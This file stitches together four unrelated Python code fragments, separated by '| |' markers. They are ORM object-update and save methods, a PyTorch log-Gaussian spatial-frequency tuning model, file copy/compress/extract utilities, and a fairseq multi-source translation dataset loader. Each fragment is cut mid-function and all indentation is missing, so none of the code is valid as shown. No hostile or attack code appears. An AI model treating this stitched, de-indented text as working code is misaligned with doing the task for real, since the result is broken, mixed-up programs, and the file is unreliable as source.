def set(obj, **kwargs):
cache = obj._cache_
if not cache.is_alive: throw_db_session_is_over(obj)
if obj._status_ in del_statuses: throw_object_was_deleted(obj)
cache.noflush += 1
try:
avdict, collection_avdict = obj._keyargs_to_avdicts_(kwargs)
status = obj._status_
wbits = obj._wbits_
get_val = obj._vals_.get
if avdict:
for attr in avdict:
old_val = get_val(attr.name, NOT_LOADED)
if old_val is NOT_LOADED and attr.reverse and not attr.reverse.is_collection:
attr.load(obj)
if wbits is not None:
new_wbits = wbits
for attr in avdict: new_wbits |= obj._bits_[attr]
obj._wbits_ = new_wbits
if status != 'updated':
obj._status_ = 'updated'
cache.modified = True
cache.updated.add(obj)
if status in ('loaded', 'saved'): cache.to_be_checked.append(obj)
else: assert status == 'to_be_checked'
if not collection_avdict:
for attr in avdict:
if attr.reverse or attr.is_part_of_unique_index: break
else:
obj._vals_.update((attr.name, new_val) for attr, new_val in avdict.iteritems())
return
undo_funcs = []
undo = []
def undo_func():
obj._status_ = status
obj._wbits_ = wbits
if wbits == 0: cache.updated.remove(obj)
if status in ('loaded', 'saved'):
to_be_checked = cache.to_be_checked
if to_be_checked and to_be_checked[-1] is obj: to_be_checked.pop()
assert obj not in to_be_checked
for index, old_key, new_key in undo:
if new_key is NO_UNDO_NEEDED: pass
else: del index[new_key]
if old_key is NO_UNDO_NEEDED: pass
else: index[old_key] = obj
NOT_FOUND = object()
try:
for attr in obj._simple_keys_:
new_val = avdict.get(attr, NOT_FOUND)
if new_val is NOT_FOUND: continue
old_val = get_val(attr.name, NOT_LOADED)
if old_val == new_val: continue
cache.update_simple_index(obj, attr, old_val, new_val, undo)
for attrs in obj._composite_keys_:
for attr in attrs:
if attr in avdict: break
else: continue
vals = [ get_val(a.name, NOT_LOADED) for a in attrs ]
currents = tuple(vals)
for i, attr in enumerate(attrs):
new_val = avdict.get(attr, NOT_FOUND)
if new_val is NOT_FOUND: continue
vals[i] = new_val
vals = tuple(vals)
cache.update_composite_index(obj, attrs, currents, vals, undo)
for attr, new_val in avdict.iteritems():
if not attr.reverse: continue
old_val = get_val(attr.name, NOT_LOADED)
attr.update_reverse(obj, old_val, new_val, undo_funcs)
for attr, new_val in collection_avdict.iteritems():
attr.__set__(obj, new_val, undo_funcs)
except:
for undo_func in undo_funcs: undo_func()
raise
obj._vals_.update((attr.name, new_val) for attr, new_val in avdict.iteritems())
finally:
cache.noflush -= 1
def _keyargs_to_avdicts_(obj, kwargs):
avdict, collection_avdict = {}, {}
get = obj._adict_.get
for name, new_val in kwargs.items():
attr = get(name)
if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
new_val = attr.check(new_val, obj, from_db=False)
if not attr.is_collection:
if attr.pk_offset is not None:
old_val = obj._vals_.get(attr.name, NOT_LOADED)
if old_val != new_val: throw(TypeError, 'Cannot change value of primary key attribute %s' % attr.name)
else: avdict[attr] = new_val
else: collection_avdict[attr] = new_val
return avdict, collection_avdict
@cut_traceback
def check_on_commit(obj):
cache = obj._cache_
if not cache.is_alive: throw_db_session_is_over(obj)
if obj._status_ not in ('loaded', 'saved'): return
obj._status_ = 'to_be_checked'
cache.to_be_checked.append(obj)
@classmethod
def _attrs_with_bit_(entity, mask=-1):
get_bit = entity._bits_.get
for attr in entity._attrs_:
bit = get_bit(attr)
if bit is None: continue
if not bit & mask: continue
yield attr
def _construct_optimistic_criteria_(obj):
optimistic_columns = []
optimistic_converters = []
optimistic_values = []
for attr in obj._attrs_with_bit_(obj._rbits_):
if not attr.columns: continue
dbval = obj._dbvals_.get(attr.name, NOT_LOADED)
assert dbval is not NOT_LOADED
optimistic_columns.extend(attr.columns)
if dbval is not None:
optimistic_converters.extend(attr.converters)
else:
optimistic_converters.extend(None for converter in attr.converters)
optimistic_values.extend(attr.get_raw_values(dbval))
return optimistic_columns, optimistic_converters, optimistic_values
def _save_principal_objects_(obj, dependent_objects):
if dependent_objects is None: dependent_objects = []
elif obj in dependent_objects:
chain = ' -> '.join(obj2.__class__.__name__ for obj2 in dependent_objects)
throw(UnresolvableCyclicDependency, 'Cannot save cyclic chain: ' + chain)
dependent_objects.append(obj)
status = obj._status_
if status == 'created': attr_iter = obj._attrs_with_bit_()
elif status == 'updated': attr_iter = obj._attrs_with_bit_(obj._wbits_)
else: assert False
for attr in attr_iter:
val = obj._vals_[attr.name]
if not attr.reverse: continue
if not attr.columns: continue
if val is None: continue
if val._status_ == 'created':
val._save_(dependent_objects)
assert val._status_ == 'saved'
def _save_created_(obj):
values = []
auto_pk = (obj._pkval_ is None)
if auto_pk: pk = obj.__class__.__dict__['_pk_']
for attr in obj._attrs_:
if not attr.columns: continue
if attr.is_collection: continue
val = obj._vals_[attr.name]
if auto_pk and attr.is_pk: continue
values.extend(attr.get_raw_values(val))
database = obj._database_
if auto_pk: cached_sql = obj._cached_create_sql_auto_pk_
else: cached_sql = obj._cached_create_sql_
if cached_sql is None:
entity = obj.__class__
if auto_pk:
columns = entity._columns_without_pk_
converters = entity._converters_without_pk_
else:
columns = entity._columns_
converters = entity._converters_
assert len(columns) == len(converters)
params = [ [ 'PARAM', i, converter ] for i, converter in enumerate(converters) ]
sql_ast = [ 'INSERT', entity._table_, columns, params ]
if auto_pk:
assert len(entity._pk_columns_) == 1
assert pk.auto
sql_ast.append(obj._pk_columns_[0])
sql, adapter = database._ast2sql(sql_ast)
if auto_pk: entity._cached_create_sql_auto_pk_ = sql, adapter
else: entity._cached_create_sql_ = sql, adapter
else: sql, adapter = cached_sql
arguments = adapter(values)
try:
if auto_pk: new_id = database._exec_sql(sql, arguments, returning_id=True)
else: database._exec_sql(sql, arguments)
except IntegrityError, e:
msg = " ".join(tostring(arg) for arg in e.args)
throw(TransactionIntegrityError,
'Object %r cannot be stored in the database (probably it already exists). %s: %s'
% (obj, e.__class__.__name__, msg), e)
except DatabaseError, e:
msg = " ".join(tostring(arg) for arg in e.args)
throw(UnexpectedError, 'Object %r cannot be stored in the database. %s: %s'
% (obj, e.__class__.__name__, msg), e)
if auto_pk:
index = obj._cache_.indexes.setdefault(pk, {})
obj2 = index.setdefault(new_id, obj)
if obj2 is not obj: throw(TransactionIntegrityError,
'Newly auto-generated id value %s was already used in transaction cache for another object' % new_id)
obj._pkval_ = obj._vals_[pk.name] = new_id
obj._newid_ = None
obj._status_ = 'saved'
obj._rbits_ = obj._all_bits_
obj._wbits_ = 0
bits = obj._bits_
for attr in obj._attrs_:
if attr not in bits: continue
obj._dbvals_[attr.name] = obj._vals_[attr.name]
def _save_updated_(obj):
update_columns = []
values = []
for attr in obj._attrs_with_bit_(obj._wbits_):
if not attr.columns: continue
update_columns.extend(attr.columns)
val = | |
<reponame>billbrod/spatial-frequency-model
#!/usr/bin/python
"""2d tuning model
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import torch
import warnings
import itertools
import re
from scipy import stats
MODEL_ORDER = ['constant_donut_period-iso_amps-iso', 'scaling_donut_period-iso_amps-iso',
'full_donut_period-iso_amps-iso', 'full_donut_period-absolute_amps-iso',
'full_donut_period-relative_amps-iso', 'full_donut_period-full_amps-iso',
'full_donut_period-iso_amps-absolute', 'full_donut_period-iso_amps-relative',
'full_donut_period-iso_amps-full', 'full_donut_period-absolute_amps-absolute',
'full_donut_period-relative_amps-relative', 'full_donut_period-full_amps-absolute',
'full_donut_period-full_amps-relative', 'full_donut_period-full_amps-full']
MODEL_PLOT_ORDER = list(range(1, len(MODEL_ORDER)+1))
def _cast_as_tensor(x):
if type(x) == pd.Series:
x = x.values
# needs to be float32 to work with the Hessian calculations
return torch.tensor(x, dtype=torch.float32)
def _cast_as_param(x, requires_grad=True):
return torch.nn.Parameter(_cast_as_tensor(x), requires_grad=requires_grad)
def _cast_args_as_tensors(args, on_cuda=False):
return_args = []
for v in args:
if not torch.is_tensor(v):
v = _cast_as_tensor(v)
if on_cuda:
v = v.cuda()
return_args.append(v)
return return_args
def _check_and_reshape_tensors(x, y):
if (x.ndimension() == 1 and y.ndimension() == 1) and (x.shape != y.shape):
x = x.repeat(len(y), 1)
y = y.repeat(x.shape[1], 1).transpose(0, 1)
return x, y
def _check_log_gaussian_params(param_vals, train_params, period_orientation_type,
eccentricity_type, amplitude_orientation_type):
if period_orientation_type in ['relative', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'abs_mode_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'abs_mode_{angle}']):
warnings.warn(f"When period_orientation_type is {period_orientation_type}, "
"all absolute variables must be 0, correcting this...")
param_vals[f'abs_mode_{angle}'] = 0
train_params[f'abs_mode_{angle}'] = False
if period_orientation_type in ['absolute', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'rel_mode_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'rel_mode_{angle}']):
warnings.warn(f"When period_orientation_type is {period_orientation_type}, "
"all relative variables must be 0, correcting this...")
param_vals[f'rel_mode_{angle}'] = 0
train_params[f'rel_mode_{angle}'] = False
if period_orientation_type not in ['relative', 'absolute', 'iso', 'full']:
raise Exception("Don't know how to handle period_orientation_type "
f"{period_orientation_type}!")
if amplitude_orientation_type in ['relative', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'abs_amplitude_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'abs_amplitude_{angle}']):
warnings.warn(f"When amplitude_orientation_type is {amplitude_orientation_type}, "
"all absolute variables must be 0, correcting this...")
param_vals[f'abs_amplitude_{angle}'] = 0
train_params[f'abs_amplitude_{angle}'] = False
if amplitude_orientation_type in ['absolute', 'iso']:
for angle in ['cardinals', 'obliques']:
if param_vals[f'rel_amplitude_{angle}'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'rel_amplitude_{angle}']):
warnings.warn(f"When amplitude_orientation_type is {amplitude_orientation_type}, "
"all relative variables must be 0, correcting this...")
param_vals[f'rel_amplitude_{angle}'] = 0
train_params[f'rel_amplitude_{angle}'] = False
if amplitude_orientation_type not in ['relative', 'absolute', 'iso', 'full']:
raise Exception("Don't know how to handle amplitude_orientation_type "
f"{amplitude_orientation_type}!")
if eccentricity_type == 'scaling':
if param_vals['sf_ecc_intercept'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'sf_ecc_intercept']):
warnings.warn("When eccentricity_type is scaling, sf_ecc_intercept must be 0! "
"correcting...")
param_vals['sf_ecc_intercept'] = 0
train_params['sf_ecc_intercept'] = False
elif eccentricity_type == 'constant':
if param_vals['sf_ecc_slope'] != 0:
# when parsing from df, these can be nan. don't need
# to raise the warning in that case
if not np.isnan(param_vals[f'sf_ecc_slope']):
warnings.warn("When eccentricity_type is constant, sf_ecc_slope must be 0! "
"correcting...")
param_vals['sf_ecc_slope'] = 0
train_params['sf_ecc_slope'] = False
elif eccentricity_type != 'full':
raise Exception("Don't know how to handle eccentricity_type %s!" % eccentricity_type)
return param_vals, train_params
class LogGaussianDonut(torch.nn.Module):
"""simple LogGaussianDonut in pytorch
orientation_type, eccentricity_type, vary_amplitude: together specify what
kind of model to train
period_orientation_type: {iso, absolute, relative, full}.
How we handle the effect of orientation on preferred period:
- iso: model is isotropic, predictions identical for all orientations.
- absolute: model can fit differences in absolute orientation, that is, in Cartesian
coordinates, such that sf_angle=0 correponds to "to the right"
- relative: model can fit differences in relative orientation, that is, in retinal polar
coordinates, such that sf_angle=0 corresponds to "away from the fovea"
- full: model can fit differences in both absolute and relative orientations
eccentricity_type: {scaling, constant, full}.
How we handle the effect of eccentricity on preferred period
- scaling: model's relationship between preferred period and eccentricity is exactly scaling,
that is, the preferred period is equal to the eccentricity.
- constant: model's relationship between preferred period and eccentricity is exactly constant,
that is, it does not change with eccentricity but is flat.
- full: model discovers the relationship between eccentricity and preferred period, though it
is constrained to be linear (i.e., model solves for a and b in $period = a * eccentricity +
b$)
amplitude_orientation_type: {iso, absolute, relative, full}.
How we handle the effect of orientation on maximum amplitude:
- iso: model is isotropic, predictions identical for all orientations.
- absolute: model can fit differences in absolute orientation, that is, in Cartesian
coordinates, such that sf_angle=0 correponds to "to the right"
- relative: model can fit differences in relative orientation, that is, in retinal polar
coordinates, such that sf_angle=0 corresponds to "away from the fovea"
- full: model can fit differences in both absolute and relative orientations
all other parameters are initial values. whether they will be fit or not (i.e., whether they
have `requires_grad=True`) depends on the values of `orientation_type`, `eccentricity_type` and
`vary_amplitude`
when you call this model, sf_angle should be the (absolute) orientation of the grating, so that
sf_angle=0 corresponds to "to the right". That is, regardless of whether the model considers
the absolute orientation, relative orientation, neither or both to be important, you always
call it with the absolute orientation.
"""
def __init__(self, period_orientation_type='iso', eccentricity_type='full',
amplitude_orientation_type='iso', sigma=.4, sf_ecc_slope=1, sf_ecc_intercept=0,
abs_mode_cardinals=0, abs_mode_obliques=0, rel_mode_cardinals=0,
rel_mode_obliques=0, abs_amplitude_cardinals=0, abs_amplitude_obliques=0,
rel_amplitude_cardinals=0, rel_amplitude_obliques=0):
super().__init__()
train_kwargs = {}
kwargs = {}
for ori, param, angle in itertools.product(['abs', 'rel'], ['mode', 'amplitude'],
['cardinals', 'obliques']):
train_kwargs['%s_%s_%s' % (ori, param, angle)] = True
kwargs['%s_%s_%s' % (ori, param, angle)] = eval('%s_%s_%s' % (ori, param, angle))
for var in ['slope', 'intercept']:
train_kwargs['sf_ecc_%s' % var] = True
kwargs['sf_ecc_%s' % var] = eval("sf_ecc_%s" % var)
kwargs, train_kwargs = _check_log_gaussian_params(kwargs, train_kwargs,
period_orientation_type,
eccentricity_type,
amplitude_orientation_type)
self.period_orientation_type = period_orientation_type
self.amplitude_orientation_type = amplitude_orientation_type
self.eccentricity_type = eccentricity_type
self.model_type = (f'{eccentricity_type}_donut_period-{period_orientation_type}_'
f'amps-{amplitude_orientation_type}')
self.sigma = _cast_as_param(sigma)
self.abs_amplitude_cardinals = _cast_as_param(kwargs['abs_amplitude_cardinals'],
train_kwargs['abs_amplitude_cardinals'])
self.abs_amplitude_obliques = _cast_as_param(kwargs['abs_amplitude_obliques'],
train_kwargs['abs_amplitude_obliques'])
self.rel_amplitude_cardinals = _cast_as_param(kwargs['rel_amplitude_cardinals'],
train_kwargs['rel_amplitude_cardinals'])
self.rel_amplitude_obliques = _cast_as_param(kwargs['rel_amplitude_obliques'],
train_kwargs['rel_amplitude_obliques'])
self.abs_mode_cardinals = _cast_as_param(kwargs['abs_mode_cardinals'],
train_kwargs['abs_mode_cardinals'])
self.abs_mode_obliques = _cast_as_param(kwargs['abs_mode_obliques'],
train_kwargs['abs_mode_obliques'])
self.rel_mode_cardinals = _cast_as_param(kwargs['rel_mode_cardinals'],
train_kwargs['rel_mode_cardinals'])
self.rel_mode_obliques = _cast_as_param(kwargs['rel_mode_obliques'],
train_kwargs['rel_mode_obliques'])
self.sf_ecc_slope = _cast_as_param(kwargs['sf_ecc_slope'],
train_kwargs['sf_ecc_slope'])
self.sf_ecc_intercept = _cast_as_param(kwargs['sf_ecc_intercept'],
train_kwargs['sf_ecc_intercept'])
@classmethod
def init_from_df(cls, df):
"""initialize from the dataframe we make summarizing the models
the df must only contain a single model (that is, it should only have 11 rows, one for each
parameter value, and a unique value for the column fit_model_type)
"""
fit_model_type = df.fit_model_type.unique()
if len(fit_model_type) > 1 or len(df) != 11:
raise Exception("df must contain exactly one model!")
params = {}
for i, row in df.iterrows():
params[row.model_parameter] = row.fit_value
# we may have renamed the model type to the version we used for
# plotting in the paper. if so, this will map it back to the original
# version so our re.findall will work as expected
model_name_map = dict(zip(MODEL_PLOT_ORDER, MODEL_ORDER))
fit_model_type = model_name_map.get(fit_model_type[0], fit_model_type[0])
parse_string = r'([a-z]+)_donut_period-([a-z]+)_amps-([a-z]+)'
ecc, period, amps = re.findall(parse_string, fit_model_type)[0]
return cls(period, ecc, amps, **params)
def __str__(self):
# so we can see the parameters
return ("{0}(sigma: {1:.03f}, sf_ecc_slope: {2:.03f}, sf_ecc_intercept: {3:.03f}, "
"abs_amplitude_cardinals: {4:.03f}, abs_amplitude_obliques: {5:.03f}, "
"abs_mode_cardinals: {6:.03f}, abs_mode_obliques: {7:.03f}, "
"rel_amplitude_cardinals: {8:.03f}, rel_amplitude_obliques: {9:.03f}, "
"rel_mode_cardinals: {10:.03f}, rel_mode_obliques: {11:.03f})").format(
type(self).__name__, self.sigma, self.sf_ecc_slope, self.sf_ecc_intercept,
self.abs_amplitude_cardinals, self.abs_amplitude_obliques,
self.abs_mode_cardinals, self.abs_mode_obliques, self.rel_amplitude_cardinals,
self.rel_amplitude_obliques, self.rel_mode_cardinals, self.rel_mode_obliques)
def __repr__(self):
return self.__str__()
def _create_mag_angle(self, extent=(-10, 10), n_samps=1001):
x = torch.linspace(extent[0], extent[1], n_samps)
x, y = torch.meshgrid(x, x)
r = torch.sqrt(torch.pow(x, 2) + torch.pow(y, 2))
th = torch.atan2(y, x)
return r, th
def create_image(self, vox_ecc, vox_angle, extent=None, n_samps=None):
vox_ecc, vox_angle = _cast_args_as_tensors([vox_ecc, vox_angle], self.sigma.is_cuda)
if vox_ecc.ndimension() == 0:
vox_ecc = vox_ecc.unsqueeze(-1)
vox_angle = vox_angle.unsqueeze(-1)
if extent is None:
extent = (-self.stim_radius_degree, self.stim_radius_degree)
if n_samps is None:
n_samps = self.image_size
r, th = self._create_mag_angle(extent, n_samps)
return self.evaluate(r.repeat(len(vox_ecc), 1, 1), th.repeat(len(vox_ecc), 1, 1),
vox_ecc, vox_angle)
def preferred_period_contour(self, preferred_period, vox_angle, sf_angle=None,
rel_sf_angle=None):
"""return eccentricity that has specified preferred_period for given sf_angle, vox_angle
either sf_angle or rel_sf_angle can be set
"""
if ((sf_angle is None and rel_sf_angle is None) or
(sf_angle is not None and rel_sf_angle is not None)):
raise Exception("Either sf_angle or rel_sf_angle must be set!")
| |
(str | None): Destination file or folder
overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
return _file_op(source, destination, _move, overwrite, fatal, logger, dryrun)
def symlink(source, destination, must_exist=True, overwrite=True, fatal=True, logger=UNSET, dryrun=UNSET):
"""Symlink `source` <- `destination`
Args:
source (str | Path | None): Source file or folder
destination (str | Path | None): Destination file or folder
must_exist (bool): If True, verify that source does indeed exist
overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
return _file_op(source, destination, _symlink, overwrite, fatal, logger, dryrun, must_exist=must_exist)
def compress(source, destination, arcname=UNSET, ext=None, overwrite=True, fatal=True, logger=UNSET, dryrun=UNSET):
"""
Args:
source (str | Path | None): Source folder to compress
destination (str | Path | None): Destination folder
arcname (str | None): Name of subfolder in archive (default: source basename)
ext (str | None): Extension determining compression (default: extension of given 'source' file)
overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
if not ext:
_, _, ext = str(destination).lower().rpartition(".")
kwargs = {}
ext = SYS_INFO.platform_id.canonical_compress_extension(ext, short_form=True)
if not ext:
message = "Unknown extension '%s': can't compress file" % os.path.basename(destination)
return abort(message, return_value=-1, fatal=fatal, logger=logger)
if arcname is UNSET:
arcname = os.path.basename(source)
arcname = to_path(arcname or "")
if ext == "zip":
func = _zip
else:
func = _tar
kwargs["mode"] = "w:" if ext == "tar" else "w:%s" % ext
return _file_op(source, destination, func, overwrite, fatal, logger, dryrun, arcname=arcname, **kwargs)
def decompress(source, destination, ext=None, overwrite=True, simplify=False, fatal=True, logger=UNSET, dryrun=UNSET):
"""
Args:
source (str | Path | None): Source file to decompress
destination (str | Path | None): Destination folder
ext (str | None): Extension determining compression (default: extension of given 'source' file)
overwrite (bool | None): True: replace existing, False: fail if destination exists, None: no destination check
simplify (bool): If True and source has only one sub-folder, extract that one sub-folder to destination
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
if not ext:
_, _, ext = str(source).lower().rpartition(".")
ext = SYS_INFO.platform_id.canonical_compress_extension(ext, short_form=True)
if not ext:
message = "Unknown extension '%s': can't decompress file" % os.path.basename(source)
return abort(message, return_value=-1, fatal=fatal, logger=logger)
func = _unzip if ext == "zip" else _untar
return _file_op(source, destination, func, overwrite, fatal, logger, dryrun, simplify=simplify)
class TempFolder:
"""Context manager for obtaining a temp folder"""
def __init__(self, anchor=True, dryrun=UNSET, follow=True):
"""
Args:
anchor (bool): If True, short-ify paths relative to used temp folder
dryrun (bool): Optionally override current dryrun setting
follow (bool): If True, change working dir to temp folder (and restore)
"""
self.anchor = anchor
self.dryrun = dryrun
self.follow = follow
self.old_cwd = None
self.tmp_folder = None
def __enter__(self):
self.dryrun = _R.set_dryrun(self.dryrun)
if not _R.is_dryrun():
# Use realpath() to properly resolve for example symlinks on OSX temp paths
self.tmp_folder = os.path.realpath(tempfile.mkdtemp())
if self.follow:
self.old_cwd = os.getcwd()
os.chdir(self.tmp_folder)
tmp = self.tmp_folder or SYMBOLIC_TMP
if self.anchor:
Anchored.add(tmp)
return tmp
def __exit__(self, *_):
_R.set_dryrun(self.dryrun)
if self.anchor:
Anchored.pop(self.tmp_folder or SYMBOLIC_TMP)
if self.old_cwd:
os.chdir(self.old_cwd)
if self.tmp_folder:
shutil.rmtree(self.tmp_folder, ignore_errors=True)
def touch(path, fatal=True, logger=UNSET, dryrun=UNSET):
"""Touch file with `path`
Args:
path (str | Path | None): Path to file to touch
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
return write(path, None, fatal=fatal, logger=logger, dryrun=dryrun)
def write(path, contents, fatal=True, logger=UNSET, dryrun=UNSET):
"""Write `contents` to file with `path`
Args:
path (str | Path | None): Path to file
contents (str | bytes | None): Contents to write (only touch file if None)
fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
dryrun (bool): Optionally override current dryrun setting
Returns:
(int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
"""
if not path:
return 0
path = resolved_path(path)
byte_size = _R.represented_bytesize(len(contents)) if contents else ""
def dryrun_msg():
return "%s %s" % ("write %s to" % byte_size if byte_size else "touch", short(path))
if _R.hdry(dryrun, logger, dryrun_msg):
return 1
ensure_folder(parent_folder(path), fatal=fatal, logger=None, dryrun=dryrun)
try:
mode = "wb" if isinstance(contents, bytes) else "wt"
with io.open(path, mode) as fh:
if contents is None:
os.utime(path, None)
else:
fh.write(contents)
_R.hlog(logger, "%s %s" % ("Wrote %s to" % byte_size if byte_size else "Touched", short(path)))
return 1
except Exception as e:
return abort("Can't write to %s" % short(path), exc_info=e, return_value=-1, fatal=fatal, logger=logger)
def _copy(source, destination, ignore=None):
"""Effective copy"""
if os.path.isdir(source):
if os.path.isdir(destination):
for fname in os.listdir(source):
_copy(os.path.join(source, fname), os.path.join(destination, fname), ignore=ignore)
else:
if os.path.isfile(destination) or os.path.islink(destination):
os.unlink(destination)
shutil.copytree(source, destination, symlinks=True, ignore=ignore)
else:
shutil.copy(source, destination)
shutil.copystat(source, destination) # Make sure last modification time is preserved
def _do_delete(path, islink, fatal):
if islink or os.path.isfile(path):
os.unlink(path)
else:
shutil.rmtree(path, ignore_errors=not fatal)
def _move(source, destination):
"""Effective move"""
shutil.move(source, destination)
def _symlink(source, destination):
"""Effective symlink"""
source = to_path(source)
destination = to_path(destination)
src = source.absolute()
dest = destination.absolute()
if str(src.parent).startswith(str(dest.parent)):
# Make relative symlinks automatically when applicable
source = src.relative_to(dest.parent)
os.symlink(source, destination)
def _tar(source, destination, arcname, mode):
"""Effective tar"""
import tarfile
source = to_path(source)
delete(destination, fatal=False, logger=None, dryrun=False)
with tarfile.open(destination, mode=mode) as fh:
fh.add(source, arcname=arcname, recursive=True)
def _move_extracted(extracted_source, destination, simplify):
# Tarballs often contain only one sub-folder, auto-unpack that to the destination (similar to how zip files work)
if simplify:
subfolders = list(ls_dir(extracted_source))
if len(subfolders) == 1 and subfolders[0].is_dir():
extracted_source = subfolders[0]
delete(destination, fatal=False, logger=None, dryrun=False)
_move(extracted_source, destination)
def _untar(source, destination, simplify):
"""Effective untar"""
import tarfile
source = to_path(source).absolute()
destination = to_path(destination).absolute()
with TempFolder():
extracted_source = to_path(source.name)
with tarfile.open(source) as fh:
fh.extractall(extracted_source)
_move_extracted(extracted_source, destination, simplify)
def _unzip(source, destination, simplify):
"""Effective unzip"""
from zipfile import ZipFile
source = to_path(source).absolute()
destination = to_path(destination).absolute()
with TempFolder():
extracted_source = to_path(source.name)
with ZipFile(source) as fh:
fh.extractall(extracted_source)
_move_extracted(extracted_source, destination, simplify)
def _zip(source, destination, arcname, fh=None):
"""Effective zip, behaving like tar+gzip for consistency"""
if fh is None:
from zipfile import ZipFile, ZIP_DEFLATED
source = to_path(source).absolute()
destination = to_path(destination).absolute()
with ZipFile(destination, mode="w", compression=ZIP_DEFLATED) as fh:
_zip(source, destination, arcname, fh=fh)
elif source.is_dir():
for f in source.iterdir():
_zip(f, destination, arcname / f.name, fh=fh)
else:
fh.write(source, arcname=arcname)
def _file_op(source, destination, func, overwrite, fatal, logger, dryrun, must_exist=True, ignore=None, **extra):
"""Call func(source, destination)
| |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass, field
import torch
from fairseq import utils
from fairseq.dataclass import ChoiceEnum
from fairseq.tasks import register_task
from fairseq.tasks.translation import TranslationConfig, TranslationTask
from fairseq.utils import new_arange
from fairseq.data import (
AppendTokenDataset,
ConcatDataset,
LanguageMultiSourceDataset,
PrependTokenDataset,
StripTokenDataset,
TruncateDataset,
data_utils,
indexed_dataset,
FairseqDataset,
iterators,
)
import logging
import os
import itertools
logger = logging.getLogger(__name__)
NOISE_CHOICES = ChoiceEnum(["random_delete", "random_mask", "no_noise"])
@dataclass
class TranslationMultiLevenshteinConfig(TranslationConfig):
noise: NOISE_CHOICES = field(
default="random_delete", metadata={"help": "type of noise"},
)
num_retrieved: int = field(
default=1,
metadata={"help": "number of co-edited sequences from the monoling corpus"},
)
max_acceptable_retrieved_ratio: float = field(
default=1.2,
metadata={
"help": "Maximum authorized ratio between retrieved examples and target"
},
)
def load_lang_multi_dataset(
data_path,
split,
src,
src_dict,
tgt,
tgt_dict,
num_multi_src,
combine,
dataset_impl,
upsample_primary,
left_pad_source,
left_pad_target,
max_source_positions,
max_target_positions,
prepend_bos=False,
load_alignments=False,
truncate_source=False,
append_source_id=False,
num_buckets=0,
shuffle=True,
pad_to_multiple=1,
prepend_bos_src=None,
):
def split_exists(split, src, tgt, lang, data_path):
filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
return indexed_dataset.dataset_exists(filename, impl=dataset_impl)
src_datasets = []
tgt_datasets = []
multi_src_datasets = []
for n in range(num_multi_src):
multi_src_datasets.append([])
for k in itertools.count():
split_k = split + (str(k) if k > 0 else "")
# infer langcode
if split_exists(split_k, src, tgt, src, data_path):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
elif split_exists(split_k, tgt, src, src, data_path):
prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
else:
if k > 0:
break
else:
raise FileNotFoundError(
"Dataset not found: {} ({})".format(split, data_path)
)
for n in range(num_multi_src):
dir1 = split_exists(split_k, src, tgt, tgt + str(n + 1), data_path)
dir2 = split_exists(split_k, tgt, src, tgt + str(n + 1), data_path)
if not (dir1 or dir2):
raise FileNotFoundError(
"Retrieval dataset #{} not found: {} ({})".format(
n + 1, split, data_path
)
)
src_dataset = data_utils.load_indexed_dataset(
prefix + src, src_dict, dataset_impl
)
if truncate_source:
src_dataset = AppendTokenDataset(
TruncateDataset(
StripTokenDataset(src_dataset, src_dict.eos()),
max_source_positions - 1,
),
src_dict.eos(),
)
src_datasets.append(src_dataset)
tgt_dataset = data_utils.load_indexed_dataset(
prefix + tgt, tgt_dict, dataset_impl
)
if tgt_dataset is not None:
tgt_datasets.append(tgt_dataset)
for n in range(num_multi_src):
single_src_dataset = data_utils.load_indexed_dataset(
prefix + tgt + str(n + 1), tgt_dict, dataset_impl
)
if single_src_dataset is not None:
multi_src_datasets[n].append(single_src_dataset)
logger.info(
"{} {} {}-{} {} examples".format(
data_path, split_k, src, tgt, len(src_datasets[-1])
)
)
if not combine:
break
assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0
if len(src_datasets) == 1:
